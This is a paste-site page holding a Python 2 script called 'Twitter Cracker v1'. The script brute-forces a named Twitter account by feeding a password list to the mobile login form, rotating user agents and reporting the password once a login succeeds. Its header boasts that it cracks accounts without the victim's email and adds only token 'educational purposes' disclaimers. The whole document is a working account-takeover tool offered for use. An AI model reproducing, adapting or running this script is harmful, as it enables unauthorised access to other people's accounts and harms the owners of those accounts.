Twitter Cracker v1


SUBMITTED BY: crazyren

DATE: May 24, 2016, 12:23 p.m.

UPDATED: May 24, 2016, 12:25 p.m.

FORMAT: Python 3.0 Traceback

SIZE: 3.8 kB

HITS: 85931

  1. #!usr/bin/python
  2. #Twitter Cracker Version 1 can crack into Twitter Database 100% without Interruption By Firewall !
  3. #This program is for educational purposes only.
  4. #Don't attack people Twitter accounts it's illegal !
  5. #If you want to crack into someone's account, you must have the permission of the user.
  6. #Mauritania Attacker is not responsible.
  7. import sys
  8. import random
  9. import mechanize
  10. import cookielib
  11. GHT = '''
  12. +=======================================+
  13. |..........Twitter Cracker v 1..........|
  14. +---------------------------------------+
  15. |#Author: Mauritania Attacker |
  16. |#Contact: Behind you ^_^ |
  17. |#Date: 06/06/2013 |
  18. |#This tool is made for pentesting. |
  19. |#Changing the Description of this tool |
  20. |Won't made you the coder ^_^ !!! |
  21. |#Respect Coderz ^_^ |
  22. |#I take no responsibilities for the |
  23. | use of this program ! |
  24. +=======================================+
  25. |..........Twitter Cracker v 1..........|
  26. +---------------------------------------+
  27. '''
  28. print "Note: - This tool can crack Twitter account even if you don't have the email of your victim"
  29. print "# Hit CTRL+C to quit the program"
  30. username = str(raw_input("# Enter |Username| Twitter : "))
  31. passwordlist = str(raw_input("Enter the name of the password list file : "))
  32. useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
  33. login = 'https://mobile.twitter.com/session'
  34. def attack(password):
  35. try:
  36. sys.stdout.write("\r[*] trying %s.. " % password)
  37. sys.stdout.flush()
  38. br.addheaders = [('User-agent', random.choice(useragents))]
  39. site = br.open(login)
  40. br.select_form(nr=0)
  41. ##Twitter
  42. br.form['username'] = username
  43. br.form['password'] = password
  44. br.submit()
  45. log = br.geturl()
  46. if log != login:
  47. print "\n\n\n [*] Password Twitter found .. !!"
  48. print "\n [*] Password : %s\n" % (password)
  49. sys.exit(1)
  50. except KeyboardInterrupt:
  51. print "\n[*] Exiting program .. "
  52. sys.exit(1)
  53. def search():
  54. global password
  55. for password in passwords:
  56. attack(password.replace("\n",""))
  57. def check():
  58. global br
  59. global passwords
  60. try:
  61. br = mechanize.Browser()
  62. cj = cookielib.LWPCookieJar()
  63. br.set_handle_robots(False)
  64. br.set_handle_equiv(True)
  65. br.set_handle_referer(True)
  66. br.set_handle_redirect(True)
  67. br.set_cookiejar(cj)
  68. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  69. except KeyboardInterrupt:
  70. print "\n[*] Exiting program ..\n"
  71. sys.exit(1)
  72. try:
  73. list = open(passwordlist, "r")
  74. passwords = list.readlines()
  75. k = 0
  76. while k < len(passwords):
  77. passwords[k] = passwords[k].strip()
  78. k += 1
  79. except IOError:
  80. print "\n [*] Error: check your password list path \n"
  81. sys.exit(1)
  82. except KeyboardInterrupt:
  83. print "\n [*] Exiting program ..\n"
  84. sys.exit(1)
  85. try:
  86. print GHT
  87. print " [*] Account to crack : %s" % (username)
  88. print " [*] Loaded :" , len(passwords), "passwords"
  89. print " [*] Cracking, please wait ..."
  90. except KeyboardInterrupt:
  91. print "\n [*] Exiting program ..\n"
  92. sys.exit(1)
  93. try:
  94. search()
  95. attack(password)
  96. except KeyboardInterrupt:
  97. print "\n [*] Exiting program ..\n"
  98. sys.exit(1)
  99. if __name__ == '__main__':
  100. check()

comments powered by Disqus